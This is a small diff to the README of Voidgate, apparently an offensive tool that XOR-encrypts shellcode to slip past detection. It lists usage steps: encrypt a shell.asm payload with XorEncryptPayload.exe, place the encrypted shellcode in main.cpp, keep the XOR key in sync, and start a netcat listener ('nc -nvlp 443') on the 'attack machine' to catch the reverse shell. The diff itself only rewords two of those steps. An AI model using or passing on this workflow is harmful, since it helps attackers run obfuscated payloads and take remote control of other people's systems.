vxCrypt0r/Voidgate/README.md

 ```
 ./XorEncryptPayload.exe C:\Path\to\shell.asm
 ```
 * 3.)
-Update it inside the main.cpp of Voidgate project
+Update the variable which contains the shellcode inside the main.cpp of Voidgate project
 * 4.)
 Ensure the xor key matches the encryptor and Voidgate project
 * 5.)
-Ensure your listener is waiting for the shellcode
+Ensure your listener is waiting on the attack machine:
 ```
 nc -nvlp 443
 ```